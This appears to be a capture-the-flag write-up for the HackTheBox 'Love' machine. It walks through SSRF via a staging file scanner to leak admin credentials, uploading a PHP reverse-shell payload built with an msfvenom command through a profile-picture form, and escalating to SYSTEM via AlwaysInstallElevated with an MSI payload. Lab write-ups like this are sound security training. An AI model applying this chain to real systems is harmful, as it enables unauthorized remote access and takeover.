HackTheBox – Love

IP: 10.10.10.239

Link: https://app.hackthebox.eu/machines/Love

Enumeration

Port Scan

Notably, we appear to have 3 web servers running, all on PHP v7.3.27, and a MariaDB server on port 3306.

The servers on port 5000 and the self-signed HTTPS server on 443 both return a 403 forbidden when trying to access.

The web server on port 80 takes us to a login form that submits to /login.php.

the main page of the server on port 80

Knowing we also have a MariaDB server running, I am going to see if we can perform any SQL injection.

The endpoint accepts a POST request with the fields voter, password, login. In my case, login is set to nothing.

Trying to pass a sql injection to both fields using CURL, I do get a weird error if I try to inject both fields:

This does reveal where the website is stored on the server itself.

If we just test things on the main UI, we get an error saying it “cannot find the id”, so we may be able to brute-force and try to figure out an ID then use sql injection for a password

It’s also worth noting there seems to be access control on the database blocking our IP from connecting:

I performed a gobuster scan and discovered several directories with directory indexing on. One of the more interesting ones to me is /includes/ which seems to be where the php files that are included in the app are.

gobuster results
/includes

Next, I investigated the server on port 443 and port 5000. The former gives us a security certificate and we can inspect that to see that the it was issued for a domain of staging.love.htb by [email protected]:

Trying to access either site gives us a 403 forbidden error. My assumption is maybe we need to get the ssl working by using our hosts file to redirect to the proper domain.

Doing so, by adding 10.10.10.239 staging.love.htb to the /etc/hosts file grants us a new website:

file scanner

We have a demo link we can insert a link to scan. I tried several different things, and we can pass the loopback 127.0.0.1 ip to the URL because this app runs on the machine with the apps on port 80 and port 5000. Doing so to port 80 shows an iframe of the voter login page:

iFrame of the server on port 80

However, most importantly, doing so to the server on port 5000 gets around the 403 forbidden error and gives us admin credentials!

Password manager on port 5000

Gobuster found an /admin page that looks almost identical with the exception it takes a username/pass instead of a voter id / pass. Supplying these credentials grants us access to the admin dashboard

admin dashboard

Gaining Reverse Shell

I browsed around the dashboard but everything is blank. What immediately struck out to me is the fact the admin in the top right has a profile picture. Clicking on this allows us to upload a photo to the profile.

upload modal

We can use this to try and upload a reverse shell. I will use msfvenom to craft a payload. We can use msfvenom -l payloads to get a list of payloads. We also know we are on windows so I am going to try for a php/meterpreter/reverse_tcp payload since our server is running PHP.

Next, I opened a new terminal to listen on port 4444, and generated the payload using:

msfvenom -p php/meterpreter/reverse_tcp LHOST=<my-ip> -f raw > shell.php

I then fired up msfconsole and ran use /exploit/multi/handler. Unfortunately, everytime it loads, the session just ends. It seems this shell will not work for us. I did some searching and found another shell that has a neat UI called the qs-php-backdoor.php. And voila this one allows us to access it:

reverse shell

I used the directory browser to find a user flag on Phoebe’s desktop. Next we are going to need to gain more access for root.

Privilege Escalation

Using the execute shell command from above, I pasted a powershell reverse shell from here. I still had my meterpreter listener running in the background from earlier, so it immediately picked it up.

I attempted to escalate this to a meterpreter shell but it failed. Next I found a script to find vulnerabilities for me here. I loaded this on the machine and ran it. We have 4 non default windows services, one update recently installed (KB4589212), AlwaysInstallElevated registry keys (where MSI files may be ran with SYSTEM privileges), 2 hijackable DLLs, among some other things.


The AlwaysInstallElevated is what immediately stands out as the next point of attack. I crafted a new msi payload via msfvenom and I uploaded this to the server.

I used the shell command again from the PHP backdoor to launch this msi and it made connection back to meterpreter:

And now we are running as system:

Now I just ran a series of commands to drop into a shell and check the Admin’s desktop for the root flag!

shell
whoami
cd ../../Users/Administrator/Desktop
dir
more root.txt

Comments

No comments available.

Leave a Reply

Your email address will not be published. Required fields are marked *